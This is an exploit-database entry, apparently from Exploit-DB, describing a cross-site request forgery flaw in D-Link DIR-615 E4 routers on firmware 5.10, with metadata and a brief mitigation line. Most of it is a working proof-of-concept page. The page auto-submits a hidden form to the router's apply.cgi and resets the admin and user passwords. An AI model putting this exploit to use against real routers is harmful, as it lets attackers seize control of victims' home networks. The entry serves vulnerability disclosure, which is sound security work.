Dlink DIR-615 Hardware Version E4 Firmware Verion 5.10 CSRF Vulnerability

vendor:

DIR-615

by:

Dhruv Shah

7.5

CVSS

HIGH

Cross Site Request Forgery

352

CWE

Product Name: DIR-615

Affected Version From: 5.1

Affected Version To: 5.1

Patch Exists: NO

Related CWE:

CPE: a:dlink:dir-615_firmware:5.10

Metasploit:

Other Scripts:

Platforms Tested: Router Web Server

2014

Dlink DIR-615 Hardware Version E4 Firmware Verion 5.10 CSRF Vulnerability

This modem's web application suffers from Cross-site request forgery through which attacker can manipulate user data via sending him malicious craft url. The modem's application does not use any security token to prevent it against CSRF. The proof of concept (PoC) and exploit can be used to change the user password.

Mitigation:

Implement CSRF protection by using security tokens or anti-CSRF measures in the web application code.

Source

Exploit-DB raw data:

####################################################################################

# Exploit Title: Dlink DIR-615 Hardware Version E4 Firmware Verion 5.10
CSRF Vulnerability
# Google Dork: N/A
# Date: 19/02/2014
# Exploit Author: Dhruv Shah
# Vendor Homepage:
http://www.dlink.com/us/en/home-solutions/connect/routers/dir-615-wireless-n-300-router
# Software Link: N/A
# Hardware Version:E4

# Firmware Version:5.10
# Tested on: Router Web Server
# CVE : N/A

###################################################################################

Cross Site Request Forgery

This Modem's Web Application , suffers from Cross-site request forgery

through which attacker can manipulate user data via sending him malicious

craft url.

The Modems's Application  not using any security token to prevent it

against CSRF. You can manipulate any userdata. PoC and Exploit to change

user password:

 In the POC the IP address in the POST is the modems IP address.



<html>

  <body>

                <form id ="poc"action="http://192.168.0.1/apply.cgi"
method="POST">

      <input type="hidden" name="html_response_page"
value="back.asp" />

      <input type="hidden" name="html_response_message"
value="The setting is saved." />

      <input type="hidden" name="html_response_return_page"
value="login.asp" />

      <input type="hidden" name="reboot_type" value="none" />

      <input type="hidden" name="button1" value="Save Settings" />

      <input type="hidden" name="admin_password" value="test" />

      <input type="hidden" name="admin_password1" value="test" />

      <input type="hidden" name="admPass2" value="test" />

      <input type="hidden" name="user_password" value="test" />

      <input type="hidden" name="user_password1" value="test" />

      <input type="hidden" name="usrPass2" value="test" />

      <input type="hidden" name="hostname" value="DIR-615" />

      <input type="hidden" name="graphical_enable" value="1" />

      <input type="hidden" name="graph_auth_enable" value="1" />

      <input type="hidden" name="remote_http_management_enable"
value="0" />

      <input type="hidden"
name="remote_http_management_inbound_filter"
value="Allow_All" />

    </form>

  </body>

  <script
type="text/javascript">document.getElementById("poc").submit();</script>

</html>

______________________

*Dhruv Shah* *aka Snypter*

Blogger | Researcher | Consultant | Writer
Youtube <http://www.youtube.com/snypter> |
Facebook<http://www.facebook.com/dhruvshahs>|
Linkedin <http://in.linkedin.com/pub/dhruv-shah/26/4a6/aa0> |
Twitter<https://twitter.com/Snypter>|
Blog <http://security-geek.in/blog/>